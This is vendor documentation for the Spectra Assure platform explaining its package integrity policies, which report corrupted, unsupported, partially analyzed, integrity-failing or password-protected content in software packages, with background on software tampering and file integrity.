Package integrity policies
Package integrity policies are a group of software quality policies used by the Spectra Assure platform to help you improve the overall software package security.
These policies are used during software package analysis to check your code and inform you if any of the built-in validation rules are violated. Specifically, package integrity policies focus on detecting and reporting data integrity issues, errors, and warnings encountered by the analysis engine when unpacking files or analyzing software packages.
In the Spectra Assure SAFE report, these policy violations can be found in the Package Integrity issue category and cause risk in the SAFE Assessment Tampering category.
Release managers and software publishers will benefit the most from the guidance provided by these policies. When Spectra Assure products detect potential data integrity issues in a software package, the affected components are highlighted in the SBOM part of the analysis report. Development teams can then apply the remediation advice for each particular policy to resolve detected issues.
Security challenges and practicesโ
Verifying and maintaining file integrity is an important practice in the context of software supply chain security. For software consumers, file integrity is a trust signal that indicates the file is exactly the same as it was when the software publisher created or updated it.
If file integrity is compromised, the best-case scenario is that it happened accidentally - that the file became corrupted because of defective storage media, unexpected software bugs, or errors during copy, move, or write operations. These types of issues can usually be resolved by recreating the file or restoring its backup copy.
A much more dangerous case is when file integrity compromise indicates that the file has been modified by untrusted parties, or points to a software tampering incident by either internal or external attackers. These types of issues require a thorough investigation, careful communication, and a strategic approach to ensure the compromise is contained to the least possible scope, ideally without affecting the software end-users at all.
Therefore, the significance of file integrity checks for software packages is manifold. They can help software publishers and consumers confirm that the contents of a software package are structurally valid and complete, that the software package has not been tampered with, and that its authenticity has been verified.
Software publishers can include steps such as hash-based file verification, code signing, and file integrity monitoring into their software development processes. Still, not all file integrity protection and verification methods are equally resilient, with hash collisions being a relatively common method used to conceal malicious changes to files. Additionally, data manipulation and corruption by insider threat actors may be more difficult to detect, as they are more familiar with an organization's processes and tools, and may have the means to circumvent any safeguards already in place. Compromised file integrity is not only a software security concern, but a serious threat to every organization's reputation, finances, and customer relationships.
The Spectra Assure platform can detect and report file integrity problems found while performing unpacking or validation steps during software package analysis. Those problems may be caused by incomplete or corrupted file content, password-protected content, unsupported file formats, or in rare cases, by issues with the analysis engine's file format parsing functions. For a limited set of archive file formats, Spectra Assure is able to decrypt password-protected content if the user provides correct passwords before the scan. This feature is available to all Spectra Assure CLI users, as well as to all users who work with the rl-scanner Docker image.
Policies in this categoryโ
Package integrity policies cover the following:
- Archive or software packaging formats unsupported by Spectra Assure
- Incomplete, corrupted, and partially analyzed software package content
- Failed integrity validation checks
- Password-protected software package content
Show/hide all policies
- SQ25101 - Detected unsupported archive or software packaging formats.
- SQ25102 - Detected packages with content that may be incomplete or corrupted.
- SQ25103 - Detected packages with content that could only be partially analyzed.
- SQ25104 - Detected packages with content that failed integrity validation checks.
- SQ25105 - Detected packages with content protected by an unknown password.
Recommended for youโ
- Software tampering (ReversingLabs glossary)
- Go below the surface on tampering: The trouble with software integrity validation (ReversingLabs blog)